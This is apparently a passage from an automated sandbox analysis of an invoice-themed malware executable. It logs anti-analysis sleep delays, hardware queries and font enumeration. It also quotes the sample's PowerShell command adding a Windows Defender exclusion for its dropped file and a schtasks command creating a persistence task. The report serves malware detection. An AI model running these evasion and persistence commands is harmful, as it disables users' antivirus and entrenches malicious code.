                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99384s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99040s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -98921s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 6096Thread sleep count: 1509 > 30
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99842s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99713s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99391s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99277s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9070Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWindow / User API: threadDelayed 1858Jump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWindow / User API: threadDelayed 1509
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 41202Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 41202Jump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99858Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99732Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99624Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99515Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99384Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99265Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99156Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99040Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 98921Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 100000
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99842
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99713
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99609
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99500
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99391
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99277
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 99172
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: txQleCu.exe, 0000000C.00000002.627295234.0000000000DF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.627240721.00000000010AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exeJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exeJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmpJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Users\user\Desktop\INVOICE_NO._29998172.exe C:\Users\user\Desktop\INVOICE_NO._29998172.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Users\user\AppData\Roaming\txQleCu.exe C:\Users\user\AppData\Roaming\txQleCu.exeJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Users\user\Desktop\INVOICE_NO._29998172.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
